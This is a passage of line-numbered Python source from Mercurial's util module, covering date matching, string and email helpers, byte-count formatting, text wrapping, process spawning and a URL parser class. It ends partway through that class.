2124 2126 if when < -0x80000000 or when > 0x7fffffff:
2125 2127 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2126 2128 if offset < -50400 or offset > 43200:
2127 2129 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2128 2130 return when, offset
2129 2131
2130 2132 def matchdate(date):
2131 2133 """Return a function that matches a given date match specifier
2132 2134
2133 2135 Formats include:
2134 2136
2135 2137 '{date}' match a given date to the accuracy provided
2136 2138
2137 2139 '<{date}' on or before a given date
2138 2140
2139 2141 '>{date}' on or after a given date
2140 2142
2141 2143 >>> p1 = parsedate(b"10:29:59")
2142 2144 >>> p2 = parsedate(b"10:30:00")
2143 2145 >>> p3 = parsedate(b"10:30:59")
2144 2146 >>> p4 = parsedate(b"10:31:00")
2145 2147 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2146 2148 >>> f = matchdate(b"10:30")
2147 2149 >>> f(p1[0])
2148 2150 False
2149 2151 >>> f(p2[0])
2150 2152 True
2151 2153 >>> f(p3[0])
2152 2154 True
2153 2155 >>> f(p4[0])
2154 2156 False
2155 2157 >>> f(p5[0])
2156 2158 False
2157 2159 """
2158 2160
2159 2161 def lower(date):
2160 2162 d = {'mb': "1", 'd': "1"}
2161 2163 return parsedate(date, extendeddateformats, d)[0]
2162 2164
2163 2165 def upper(date):
2164 2166 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2165 2167 for days in ("31", "30", "29"):
2166 2168 try:
2167 2169 d["d"] = days
2168 2170 return parsedate(date, extendeddateformats, d)[0]
2169 2171 except Abort:
2170 2172 pass
2171 2173 d["d"] = "28"
2172 2174 return parsedate(date, extendeddateformats, d)[0]
2173 2175
2174 2176 date = date.strip()
2175 2177
2176 2178 if not date:
2177 2179 raise Abort(_("dates cannot consist entirely of whitespace"))
2178 2180 elif date[0] == "<":
2179 2181 if not date[1:]:
2180 2182 raise Abort(_("invalid day spec, use '<DATE'"))
2181 2183 when = upper(date[1:])
2182 2184 return lambda x: x <= when
2183 2185 elif date[0] == ">":
2184 2186 if not date[1:]:
2185 2187 raise Abort(_("invalid day spec, use '>DATE'"))
2186 2188 when = lower(date[1:])
2187 2189 return lambda x: x >= when
2188 2190 elif date[0] == "-":
2189 2191 try:
2190 2192 days = int(date[1:])
2191 2193 except ValueError:
2192 2194 raise Abort(_("invalid day spec: %s") % date[1:])
2193 2195 if days < 0:
2194 2196 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2195 2197 % date[1:])
2196 2198 when = makedate()[0] - days * 3600 * 24
2197 2199 return lambda x: x >= when
2198 2200 elif " to " in date:
2199 2201 a, b = date.split(" to ")
2200 2202 start, stop = lower(a), upper(b)
2201 2203 return lambda x: x >= start and x <= stop
2202 2204 else:
2203 2205 start, stop = lower(date), upper(date)
2204 2206 return lambda x: x >= start and x <= stop
2205 2207
2206 2208 def stringmatcher(pattern, casesensitive=True):
2207 2209 """
2208 2210 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2209 2211 returns the matcher name, pattern, and matcher function.
2210 2212 missing or unknown prefixes are treated as literal matches.
2211 2213
2212 2214 helper for tests:
2213 2215 >>> def test(pattern, *tests):
2214 2216 ... kind, pattern, matcher = stringmatcher(pattern)
2215 2217 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2216 2218 >>> def itest(pattern, *tests):
2217 2219 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2218 2220 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2219 2221
2220 2222 exact matching (no prefix):
2221 2223 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2222 2224 ('literal', 'abcdefg', [False, False, True])
2223 2225
2224 2226 regex matching ('re:' prefix)
2225 2227 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2226 2228 ('re', 'a.+b', [False, False, True])
2227 2229
2228 2230 force exact matches ('literal:' prefix)
2229 2231 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2230 2232 ('literal', 're:foobar', [False, True])
2231 2233
2232 2234 unknown prefixes are ignored and treated as literals
2233 2235 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2234 2236 ('literal', 'foo:bar', [False, False, True])
2235 2237
2236 2238 case insensitive regex matches
2237 2239 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2238 2240 ('re', 'A.+b', [False, False, True])
2239 2241
2240 2242 case insensitive literal matches
2241 2243 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2242 2244 ('literal', 'ABCDEFG', [False, False, True])
2243 2245 """
2244 2246 if pattern.startswith('re:'):
2245 2247 pattern = pattern[3:]
2246 2248 try:
2247 2249 flags = 0
2248 2250 if not casesensitive:
2249 2251 flags = remod.I
2250 2252 regex = remod.compile(pattern, flags)
2251 2253 except remod.error as e:
2252 2254 raise error.ParseError(_('invalid regular expression: %s')
2253 2255 % e)
2254 2256 return 're', pattern, regex.search
2255 2257 elif pattern.startswith('literal:'):
2256 2258 pattern = pattern[8:]
2257 2259
2258 2260 match = pattern.__eq__
2259 2261
2260 2262 if not casesensitive:
2261 2263 ipat = encoding.lower(pattern)
2262 2264 match = lambda s: ipat == encoding.lower(s)
2263 2265 return 'literal', pattern, match
2264 2266
2265 2267 def shortuser(user):
2266 2268 """Return a short representation of a user name or email address."""
2267 2269 f = user.find('@')
2268 2270 if f >= 0:
2269 2271 user = user[:f]
2270 2272 f = user.find('<')
2271 2273 if f >= 0:
2272 2274 user = user[f + 1:]
2273 2275 f = user.find(' ')
2274 2276 if f >= 0:
2275 2277 user = user[:f]
2276 2278 f = user.find('.')
2277 2279 if f >= 0:
2278 2280 user = user[:f]
2279 2281 return user
2280 2282
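# For example (hypothetical address):
#
#   >>> shortuser(b'John Doe <john.doe@example.com>')
#   'john'
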
2281 2283 def emailuser(user):
2282 2284 """Return the user portion of an email address."""
2283 2285 f = user.find('@')
2284 2286 if f >= 0:
2285 2287 user = user[:f]
2286 2288 f = user.find('<')
2287 2289 if f >= 0:
2288 2290 user = user[f + 1:]
2289 2291 return user
2290 2292
2291 2293 def email(author):
2292 2294 '''get email of author.'''
2293 2295 r = author.find('>')
2294 2296 if r == -1:
2295 2297 r = None
2296 2298 return author[author.find('<') + 1:r]
2297 2299
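# For example (hypothetical author strings):
#
#   >>> email(b'John Doe <john.doe@example.com>')
#   'john.doe@example.com'
#   >>> email(b'john.doe@example.com')
#   'john.doe@example.com'
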
2298 2300 def ellipsis(text, maxlength=400):
2299 2301 """Trim string to at most maxlength (default: 400) columns in display."""
2300 2302 return encoding.trim(text, maxlength, ellipsis='...')
2301 2303
2302 2304 def unitcountfn(*unittable):
2303 2305 '''return a function that renders a readable count of some quantity'''
2304 2306
2305 2307 def go(count):
2306 2308 for multiplier, divisor, format in unittable:
2307 2309 if abs(count) >= divisor * multiplier:
2308 2310 return format % (count / float(divisor))
2309 2311 return unittable[-1][2] % count
2310 2312
2311 2313 return go
2312 2314
2313 2315 def processlinerange(fromline, toline):
2314 2316 """Check that linerange <fromline>:<toline> makes sense and return a
2315 2317 0-based range.
2316 2318
2317 2319 >>> processlinerange(10, 20)
2318 2320 (9, 20)
2319 2321 >>> processlinerange(2, 1)
2320 2322 Traceback (most recent call last):
2321 2323 ...
2322 2324 ParseError: line range must be positive
2323 2325 >>> processlinerange(0, 5)
2324 2326 Traceback (most recent call last):
2325 2327 ...
2326 2328 ParseError: fromline must be strictly positive
2327 2329 """
2328 2330 if toline - fromline < 0:
2329 2331 raise error.ParseError(_("line range must be positive"))
2330 2332 if fromline < 1:
2331 2333 raise error.ParseError(_("fromline must be strictly positive"))
2332 2334 return fromline - 1, toline
2333 2335
2334 2336 bytecount = unitcountfn(
2335 2337 (100, 1 << 30, _('%.0f GB')),
2336 2338 (10, 1 << 30, _('%.1f GB')),
2337 2339 (1, 1 << 30, _('%.2f GB')),
2338 2340 (100, 1 << 20, _('%.0f MB')),
2339 2341 (10, 1 << 20, _('%.1f MB')),
2340 2342 (1, 1 << 20, _('%.2f MB')),
2341 2343 (100, 1 << 10, _('%.0f KB')),
2342 2344 (10, 1 << 10, _('%.1f KB')),
2343 2345 (1, 1 << 10, _('%.2f KB')),
2344 2346 (1, 1, _('%.0f bytes')),
2345 2347 )
2346 2348
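# The table is ordered from coarse to fine units, so the first row
# whose threshold is met wins:
#
#   >>> bytecount(2252)
#   '2.20 KB'
#   >>> bytecount(1 << 30)
#   '1.00 GB'
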
2347 2349 # Matches a single EOL which can either be a CRLF where repeated CR
2348 2350 # are removed or a LF. We do not care about old Macintosh files, so a
2349 2351 # stray CR is an error.
2350 2352 _eolre = remod.compile(br'\r*\n')
2351 2353
2352 2354 def tolf(s):
2353 2355 return _eolre.sub('\n', s)
2354 2356
2355 2357 def tocrlf(s):
2356 2358 return _eolre.sub('\r\n', s)
2357 2359
2358 2360 if pycompat.oslinesep == '\r\n':
2359 2361 tonativeeol = tocrlf
2360 2362 fromnativeeol = tolf
2361 2363 else:
2362 2364 tonativeeol = pycompat.identity
2363 2365 fromnativeeol = pycompat.identity
2364 2366
2365 2367 def escapestr(s):
2366 2368 # call underlying function of s.encode('string_escape') directly for
2367 2369 # Python 3 compatibility
2368 2370 return codecs.escape_encode(s)[0]
2369 2371
2370 2372 def unescapestr(s):
2371 2373 return codecs.escape_decode(s)[0]
2372 2374
2373 2375 def forcebytestr(obj):
2374 2376 """Portably format an arbitrary object (e.g. exception) into a byte
2375 2377 string."""
2376 2378 try:
2377 2379 return pycompat.bytestr(obj)
2378 2380 except UnicodeEncodeError:
2379 2381 # non-ascii string, may be lossy
2380 2382 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2381 2383
2382 2384 def uirepr(s):
2383 2385 # Avoid double backslash in Windows path repr()
2384 2386 return repr(s).replace('\\\\', '\\')
2385 2387
2386 2388 # delay import of textwrap
2387 2389 def MBTextWrapper(**kwargs):
2388 2390 class tw(textwrap.TextWrapper):
2389 2391 """
2390 2392 Extend TextWrapper for width-awareness.
2391 2393
2392 2394 Neither the number of 'bytes' in any encoding nor the number of
2393 2395 'characters' is appropriate for calculating terminal columns for a string.
2394 2396
2395 2397 The original TextWrapper implementation uses the built-in 'len()'
2396 2398 directly, so overriding is needed to use the width information of each character.
2397 2399
2398 2400 In addition, characters classified as 'ambiguous' width are
2399 2401 treated as wide in East Asian locales, but as narrow elsewhere.
2400 2402
2401 2403 This requires a user decision to determine the width of such characters.
2402 2404 """
2403 2405 def _cutdown(self, ucstr, space_left):
2404 2406 l = 0
2405 2407 colwidth = encoding.ucolwidth
2406 2408 for i in xrange(len(ucstr)):
2407 2409 l += colwidth(ucstr[i])
2408 2410 if space_left < l:
2409 2411 return (ucstr[:i], ucstr[i:])
2410 2412 return ucstr, ''
2411 2413
2412 2414 # overriding of base class
2413 2415 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2414 2416 space_left = max(width - cur_len, 1)
2415 2417
2416 2418 if self.break_long_words:
2417 2419 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2418 2420 cur_line.append(cut)
2419 2421 reversed_chunks[-1] = res
2420 2422 elif not cur_line:
2421 2423 cur_line.append(reversed_chunks.pop())
2422 2424
2423 2425 # this overriding code is imported from TextWrapper of Python 2.6
2424 2426 # to calculate columns of string by 'encoding.ucolwidth()'
2425 2427 def _wrap_chunks(self, chunks):
2426 2428 colwidth = encoding.ucolwidth
2427 2429
2428 2430 lines = []
2429 2431 if self.width <= 0:
2430 2432 raise ValueError("invalid width %r (must be > 0)" % self.width)
2431 2433
2432 2434 # Arrange in reverse order so items can be efficiently popped
2433 2435 # from a stack of chunks.
2434 2436 chunks.reverse()
2435 2437
2436 2438 while chunks:
2437 2439
2438 2440 # Start the list of chunks that will make up the current line.
2439 2441 # cur_len is just the length of all the chunks in cur_line.
2440 2442 cur_line = []
2441 2443 cur_len = 0
2442 2444
2443 2445 # Figure out which static string will prefix this line.
2444 2446 if lines:
2445 2447 indent = self.subsequent_indent
2446 2448 else:
2447 2449 indent = self.initial_indent
2448 2450
2449 2451 # Maximum width for this line.
2450 2452 width = self.width - len(indent)
2451 2453
2452 2454 # First chunk on line is whitespace -- drop it, unless this
2453 2455 # is the very beginning of the text (i.e. no lines started yet).
2454 2456 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2455 2457 del chunks[-1]
2456 2458
2457 2459 while chunks:
2458 2460 l = colwidth(chunks[-1])
2459 2461
2460 2462 # Can at least squeeze this chunk onto the current line.
2461 2463 if cur_len + l <= width:
2462 2464 cur_line.append(chunks.pop())
2463 2465 cur_len += l
2464 2466
2465 2467 # Nope, this line is full.
2466 2468 else:
2467 2469 break
2468 2470
2469 2471 # The current line is full, and the next chunk is too big to
2470 2472 # fit on *any* line (not just this one).
2471 2473 if chunks and colwidth(chunks[-1]) > width:
2472 2474 self._handle_long_word(chunks, cur_line, cur_len, width)
2473 2475
2474 2476 # If the last chunk on this line is all whitespace, drop it.
2475 2477 if (self.drop_whitespace and
2476 2478 cur_line and cur_line[-1].strip() == r''):
2477 2479 del cur_line[-1]
2478 2480
2479 2481 # Convert current line back to a string and store it in list
2480 2482 # of all lines (return value).
2481 2483 if cur_line:
2482 2484 lines.append(indent + r''.join(cur_line))
2483 2485
2484 2486 return lines
2485 2487
2486 2488 global MBTextWrapper
2487 2489 MBTextWrapper = tw
2488 2490 return tw(**kwargs)
2489 2491
2490 2492 def wrap(line, width, initindent='', hangindent=''):
2491 2493 maxindent = max(len(hangindent), len(initindent))
2492 2494 if width <= maxindent:
2493 2495 # adjust for weird terminal size
2494 2496 width = max(78, maxindent + 1)
2495 2497 line = line.decode(pycompat.sysstr(encoding.encoding),
2496 2498 pycompat.sysstr(encoding.encodingmode))
2497 2499 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2498 2500 pycompat.sysstr(encoding.encodingmode))
2499 2501 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2500 2502 pycompat.sysstr(encoding.encodingmode))
2501 2503 wrapper = MBTextWrapper(width=width,
2502 2504 initial_indent=initindent,
2503 2505 subsequent_indent=hangindent)
2504 2506 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2505 2507
2506 2508 if (pyplatform.python_implementation() == 'CPython' and
2507 2509 sys.version_info < (3, 0)):
2508 2510 # There is an issue in CPython that some IO methods do not handle EINTR
2509 2511 # correctly. The following table shows what CPython version (and functions)
2510 2512 # are affected (buggy: has the EINTR bug, okay: otherwise):
2511 2513 #
2512 2514 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2513 2515 # --------------------------------------------------
2514 2516 # fp.__iter__ | buggy | buggy | okay
2515 2517 # fp.read* | buggy | okay [1] | okay
2516 2518 #
2517 2519 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2518 2520 #
2519 2521 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2520 2522 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2521 2523 #
2522 2524 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2523 2525 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2524 2526 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2525 2527 # fp.__iter__ but not other fp.read* methods.
2526 2528 #
2527 2529 # On modern systems like Linux, the "read" syscall cannot be interrupted
2528 2530 # when reading "fast" files like on-disk files. So the EINTR issue only
2529 2531 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2530 2532 # files approximately as "fast" files and use the fast (unsafe) code path,
2531 2533 # to minimize the performance impact.
2532 2534 if sys.version_info >= (2, 7, 4):
2533 2535 # fp.readline deals with EINTR correctly, use it as a workaround.
2534 2536 def _safeiterfile(fp):
2535 2537 return iter(fp.readline, '')
2536 2538 else:
2537 2539 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2538 2540 # note: this may block longer than necessary because of bufsize.
2539 2541 def _safeiterfile(fp, bufsize=4096):
2540 2542 fd = fp.fileno()
2541 2543 line = ''
2542 2544 while True:
2543 2545 try:
2544 2546 buf = os.read(fd, bufsize)
2545 2547 except OSError as ex:
2546 2548 # os.read only raises EINTR before any data is read
2547 2549 if ex.errno == errno.EINTR:
2548 2550 continue
2549 2551 else:
2550 2552 raise
2551 2553 line += buf
2552 2554 if '\n' in buf:
2553 2555 splitted = line.splitlines(True)
2554 2556 line = ''
2555 2557 for l in splitted:
2556 2558 if l[-1] == '\n':
2557 2559 yield l
2558 2560 else:
2559 2561 line = l
2560 2562 if not buf:
2561 2563 break
2562 2564 if line:
2563 2565 yield line
2564 2566
2565 2567 def iterfile(fp):
2566 2568 fastpath = True
2567 2569 if type(fp) is file:
2568 2570 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2569 2571 if fastpath:
2570 2572 return fp
2571 2573 else:
2572 2574 return _safeiterfile(fp)
2573 2575 else:
2574 2576 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2575 2577 def iterfile(fp):
2576 2578 return fp
2577 2579
2578 2580 def iterlines(iterator):
2579 2581 for chunk in iterator:
2580 2582 for line in chunk.splitlines():
2581 2583 yield line
2582 2584
2583 2585 def expandpath(path):
2584 2586 return os.path.expanduser(os.path.expandvars(path))
2585 2587
2586 2588 def hgcmd():
2587 2589 """Return the command used to execute current hg
2588 2590
2589 2591 This is different from hgexecutable() because on Windows we want
2590 2592 to avoid things opening new shell windows like batch files, so we
2591 2593 get either the python call or current executable.
2592 2594 """
2593 2595 if mainfrozen():
2594 2596 if getattr(sys, 'frozen', None) == 'macosx_app':
2595 2597 # Env variable set by py2app
2596 2598 return [encoding.environ['EXECUTABLEPATH']]
2597 2599 else:
2598 2600 return [pycompat.sysexecutable]
2599 2601 return gethgcmd()
2600 2602
2601 2603 def rundetached(args, condfn):
2602 2604 """Execute the argument list in a detached process.
2603 2605
2604 2606 condfn is a callable which is called repeatedly and should return
2605 2607 True once the child process is known to have started successfully.
2606 2608 At this point, the child process PID is returned. If the child
2607 2609 process fails to start or finishes before condfn() evaluates to
2608 2610 True, return -1.
2609 2611 """
2610 2612 # Windows case is easier because the child process is either
2611 2613 # successfully starting and validating the condition or exiting
2612 2614 # on failure. We just poll on its PID. On Unix, if the child
2613 2615 # process fails to start, it will be left in a zombie state until
2614 2616 # the parent wait on it, which we cannot do since we expect a long
2615 2617 # running process on success. Instead we listen for SIGCHLD telling
2616 2618 # us our child process terminated.
2617 2619 terminated = set()
2618 2620 def handler(signum, frame):
2619 2621 terminated.add(os.wait())
2620 2622 prevhandler = None
2621 2623 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2622 2624 if SIGCHLD is not None:
2623 2625 prevhandler = signal.signal(SIGCHLD, handler)
2624 2626 try:
2625 2627 pid = spawndetached(args)
2626 2628 while not condfn():
2627 2629 if ((pid in terminated or not testpid(pid))
2628 2630 and not condfn()):
2629 2631 return -1
2630 2632 time.sleep(0.1)
2631 2633 return pid
2632 2634 finally:
2633 2635 if prevhandler is not None:
2634 2636 signal.signal(signal.SIGCHLD, prevhandler)
2635 2637
2636 2638 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2637 2639 """Return the result of interpolating items in the mapping into string s.
2638 2640
2639 2641 prefix is a single character string, or a two character string with
2640 2642 a backslash as the first character if the prefix needs to be escaped in
2641 2643 a regular expression.
2642 2644
2643 2645 fn is an optional function that will be applied to the replacement text
2644 2646 just before replacement.
2645 2647
2646 2648 escape_prefix is an optional flag that allows a doubled prefix to be
2647 2649 used to escape the prefix character itself.
2648 2650 """
2649 2651 fn = fn or (lambda s: s)
2650 2652 patterns = '|'.join(mapping.keys())
2651 2653 if escape_prefix:
2652 2654 patterns += '|' + prefix
2653 2655 if len(prefix) > 1:
2654 2656 prefix_char = prefix[1:]
2655 2657 else:
2656 2658 prefix_char = prefix
2657 2659 mapping[prefix_char] = prefix_char
2658 2660 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2659 2661 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2660 2662
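# A small sketch (hypothetical mapping; '$' must be escaped because it
# is special in regular expressions):
#
#   >>> interpolate(br'\$', {b'foo': b'bar'}, b'say $foo')
#   'say bar'
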
2661 2663 def getport(port):
2662 2664 """Return the port for a given network service.
2663 2665
2664 2666 If port is an integer, it's returned as is. If it's a string, it's
2665 2667 looked up using socket.getservbyname(). If there's no matching
2666 2668 service, error.Abort is raised.
2667 2669 """
2668 2670 try:
2669 2671 return int(port)
2670 2672 except ValueError:
2671 2673 pass
2672 2674
2673 2675 try:
2674 2676 return socket.getservbyname(port)
2675 2677 except socket.error:
2676 2678 raise Abort(_("no port number associated with service '%s'") % port)
2677 2679
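# For example:
#
#   >>> getport(8000)
#   8000
#   >>> getport(b'8000')
#   8000
#
# A name like getport(b'http') is resolved through
# socket.getservbyname() and would typically return 80.
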
2678 2680 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2679 2681 '0': False, 'no': False, 'false': False, 'off': False,
2680 2682 'never': False}
2681 2683
2682 2684 def parsebool(s):
2683 2685 """Parse s into a boolean.
2684 2686
2685 2687 If s is not a valid boolean, returns None.
2686 2688 """
2687 2689 return _booleans.get(s.lower(), None)
2688 2690
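# For example:
#
#   >>> parsebool(b'yes'), parsebool(b'off'), parsebool(b'maybe')
#   (True, False, None)
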
2689 2691 _hextochr = dict((a + b, chr(int(a + b, 16)))
2690 2692 for a in string.hexdigits for b in string.hexdigits)
2691 2693
2692 2694 class url(object):
2693 2695 r"""Reliable URL parser.
2694 2696
2695 2697 This parses URLs and provides attributes for the following
2696 2698 components:
2697 2699
2698 2700 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2699 2701
2700 2702 Missing components are set to None. The only exception is
2701 2703 fragment, which is set to '' if present but empty.
2702 2704
2703 2705 If parsefragment is False, fragment is included in query. If
2704 2706 parsequery is False, query is included in path. If both are
2705 2707 False, both fragment and query are included in path.
2706 2708
2707 2709 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2708 2710
2709 2711 Note that for backward compatibility reasons, bundle URLs do not
2710 2712 take host names. That means 'bundle://../' has a path of '../'.
2711 2713
2712 2714 Examples:
2713 2715
2714 2716 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2715 2717 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2716 2718 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2717 2719 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2718 2720 >>> url(b'file:///home/joe/repo')
2719 2721 <url scheme: 'file', path: '/home/joe/repo'>
2720 2722 >>> url(b'file:///c:/temp/foo/')
2721 2723 <url scheme: 'file', path: 'c:/temp/foo/'>
2722 2724 >>> url(b'bundle:foo')
2723 2725 <url scheme: 'bundle', path: 'foo'>
2724 2726 >>> url(b'bundle://../foo')
2725 2727 <url scheme: 'bundle', path: '../foo'>
2726 2728 >>> url(br'c:\foo\bar')
2727 2729 <url path: 'c:\\foo\\bar'>
2728 2730 >>> url(br'\\blah\blah\blah')
2729 2731 <url path: '\\\\blah\\blah\\blah'>
2730 2732 >>> url(br'\\blah\blah\blah#baz')
2731 2733 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2732 2734 >>> url(br'file:///C:\users\me')
2733 2735 <url scheme: 'file', path: 'C:\\users\\me'>
2734 2736
2735 2737 Authentication credentials:
2736 2738
2737 2739 >>> url(b'ssh://joe:xyz@x/repo')
2738 2740 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2739 2741 >>> url(b'ssh://joe@x/repo')
2740 2742 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2741 2743
2742 2744 Query strings and fragments:
2743 2745
2744 2746 >>> url(b'http://host/a?b#c')
2745 2747 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2746 2748 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2747 2749 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2748 2750
2749 2751 Empty path:
2750 2752
2751 2753 >>> url(b'')
2752 2754 <url path: ''>
2753 2755 >>> url(b'#a')
2754 2756 <url path: '', fragment: 'a'>
2755 2757 >>> url(b'http://host/')
2756 2758 <url scheme: 'http', host: 'host', path: ''>
2757 2759 >>> url(b'http://host/#a')
2758 2760 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2759 2761
2760 2762 Only scheme:
2761 2763
2762 2764 >>> url(b'http:')
2763 2765 <url scheme: 'http'>
2764 2766 """
2765 2767
2766 2768 _safechars = "!~*'()+"
2767 2769 _safepchars = "/!~*'()+:\\"
2768 2770 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2769 2771
2770 2772 def __init__(self, path, parsequery=True, parsefragment=True):
2771 2773 # We slowly chomp away at path until we have only the path left
2772 2774 self.scheme = self.user = self.passwd = self.host = None
2773 2775 self.port = self.path = self.query = self.fragment = None
2774 2776 self._localpath = True
2775 2777 self._hostport = ''
2776 2778 self._origpath = path
2777 2779
2778 2780 if parsefragment and '#' in path:
2779 2781 path, self.fragment = path.split('#', 1)
2780 2782
2781 2783 # special case for Windows drive letters and UNC paths
2782 2784 if hasdriveletter(path) or path.startswith('\\\\'):
2783 2785 self.path = path
2784 2786 return
2785 2787
2786 2788 # For compatibility reasons, we can't handle bundle paths as
2787 2789 # normal URLS
2788 2790 if path.startswith('bundle:'):
2789 2791 self.scheme = 'bundle'
2790 2792 path = path[7:]
2791 2793 if path.startswith('//'):
2792 2794 path = path[2:]
2793 2795 self.path = path
2794 2796 return
2795 2797
2796 2798 if self._matchscheme(path):
2797 2799 parts = path.split(':', 1)
2798 2800 if parts[0]:
2799 2801 self.scheme, path = parts
2800 2802 self._localpath = False
2801 2803
2802 2804 if not path:
2803 2805 path = None
2804 2806 if self._localpath:
2805 2807 self.path = ''
2806 2808 return
2807 2809 else:
2808 2810 if self._localpath:
2809 2811 self.path = path
2810 2812 return
2811 2813
2812 2814 if parsequery and '?' in path:
2813 2815 path, self.query = path.split('?', 1)
2814 2816 if not path:
2815 2817 path = None
2816 2818 if not self.query:
2817 2819 self.query = None
2818 2820
2819 2821 # // is required to specify a host/authority
2820 2822 if path and path.startswith('//'):
2821 2823 parts = path[2:].split('/', 1)
2822 2824 if len(parts) > 1:
2823 2825 self.host, path = parts
2824 2826 else:
2825 2827 self.host = parts[0]
2826 2828 path = None
2827 2829 if not self.host:
2828 2830 self.host = None
2829 2831 # path of file:///d is /d
2830 2832 # path of file:///d:/ is d:/, not /d:/
2831 2833 if path and not hasdriveletter(path):
2832 2834 path = '/' + path
2833 2835
2834 2836 if self.host and '@' in self.host:
2835 2837 self.user, self.host = self.host.rsplit('@', 1)
2836 2838 if ':' in self.user:
2837 2839 self.user, self.passwd = self.user.split(':', 1)
2838 2840 if not self.host:
2839 2841 self.host = None
2840 2842
2841 2843 # Don't split on colons in IPv6 addresses without ports
2842 2844 if (self.host and ':' in self.host and
2843 2845 not (self.host.startswith('[') and self.host.endswith(']'))):
2844 2846 self._hostport = self.host
2845 2847 self.host, self.port = self.host.rsplit(':', 1)
2846 2848 if not self.host:
2847 2849 self.host = None
2848 2850
2849 2851 if (self.host and self.scheme == 'file' and
2850 2852 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2851 2853 raise Abort(_('file:// URLs can only refer to localhost'))
2852 2854
2853 2855 self.path = path
2854 2856
2855 2857 # leave the query string escaped
2856 2858 for a in ('user', 'passwd', 'host', 'port',
2857 2859 'path', 'fragment'):
2858 2860 v = getattr(self, a)
2859 2861 if v is not None:
2860 2862 setattr(self, a, urlreq.unquote(v))
2861 2863
2862 2864 @encoding.strmethod
2863 2865 def __repr__(self):
2864 2866 attrs = []
2865 2867 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2866 2868 'query', 'fragment'):
2867 2869 v = getattr(self, a)
2868 2870 if v is not None:
2869 2871 attrs.append('%s: %r' % (a, v))
2870 2872 return '<url %s>' % ', '.join(attrs)
2871 2873
2872 2874 def __bytes__(self):
2873 2875 r"""Join the URL's components back into a URL string.
2874 2876
2875 2877 Examples:
2876 2878
2877 2879 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2878 2880 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2879 2881 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2880 2882 'http://user:pw@host:80/?foo=bar&baz=42'
2881 2883 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2882 2884 'http://user:pw@host:80/?foo=bar%3dbaz'
2883 2885 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2884 2886 'ssh://user:pw@[::1]:2200//home/joe#'
2885 2887 >>> bytes(url(b'http://localhost:80//'))
2886 2888 'http://localhost:80//'
2887 2889 >>> bytes(url(b'http://localhost:80/'))
2888 2890 'http://localhost:80/'
2889 2891 >>> bytes(url(b'http://localhost:80'))
2890 2892 'http://localhost:80/'
2891 2893 >>> bytes(url(b'bundle:foo'))
2892 2894 'bundle:foo'
2893 2895 >>> bytes(url(b'bundle://../foo'))
2894 2896 'bundle:../foo'
2895 2897 >>> bytes(url(b'path'))
2896 2898 'path'
2897 2899 >>> bytes(url(b'file:///tmp/foo/bar'))
2898 2900 'file:///tmp/foo/bar'
2899 2901 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2900 2902 'file:///c:/tmp/foo/bar'
2901 2903 >>> print(url(br'bundle:foo\bar'))
2902 2904 bundle:foo\bar
2903 2905 >>> print(url(br'file:///D:\data\hg'))
2904 2906 file:///D:\data\hg
2905 2907 """
2906 2908 if self._localpath:
